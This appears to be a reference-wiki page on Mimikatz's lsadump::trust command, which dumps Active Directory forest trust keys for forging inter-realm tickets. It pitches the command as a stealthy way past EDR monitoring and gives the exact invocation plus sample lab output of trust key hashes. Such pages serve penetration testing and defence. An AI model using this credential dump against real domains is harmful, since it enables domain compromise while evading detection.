Links

trust

lsadump::trust can be used for dumping the forest trust keys. Forest trust keys can be leveraged for forging inter-realm trust tickets. Since most of the EDRs are paying attention to the KRBTGT hash, this is a stealthy way to compromise forest trusts.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
mimikatz # lsadump::trust /patch
Current domain: CORP.LAB.LOCAL (corp / S-1-5-21-1874506631-3219952063-538504511)
Domain: EXTERNAL.LOCAL (external / S-1-5-21-280534878-1496970234-700767426)
[ In ] CORP.LAB.LOCAL -> EXTERNAL.LOCAL
* aes256_hmac 6994cc6cd1b99bd3869685d14af347e955e9e043f2116ca1665f371efe48fab6
* aes128_hmac feeeb865b37c281b21cfa00aee1da71b
* rc4_hmac_nt 6f9e27669d07b6c7f539c5f6e7fd9f57
[ Out ] EXTERNAL.LOCAL -> CORP.LAB.LOCAL
* aes256_hmac f3417d40bb3e6f2c585e0cb00cf36444b6ebf293407103ca25d8b0650219d82d
* aes128_hmac 8687ec2ba8ec3e8d8c6e89e94b87792c
* rc4_hmac_nt d3b3645b2c8efd19794dfae2dfa6946e
[ In-1] CORP.LAB.LOCAL -> EXTERNAL.LOCAL
* aes256_hmac cec1143242386747b41ea21b071bfa2b211c184699c57cc69bd3f43da57bfef6
* aes128_hmac 8668ebdcb5b9349b6c279ca9cd421a60
* rc4_hmac_nt 4a49505568b59490b41724ce676978e5
[Out-1] EXTERNAL.LOCAL -> CORP.LAB.LOCAL
* aes256_hmac 9304fef5575424542d1c6cdda1920927cb55df8c203079b51e4e2cfc1cab0d4b
* aes128_hmac 4cc55daa23d585257ab877914ea42968
* rc4_hmac_nt a2639f30fa151b45696631b80f57f4e6
Last modified 1yr ago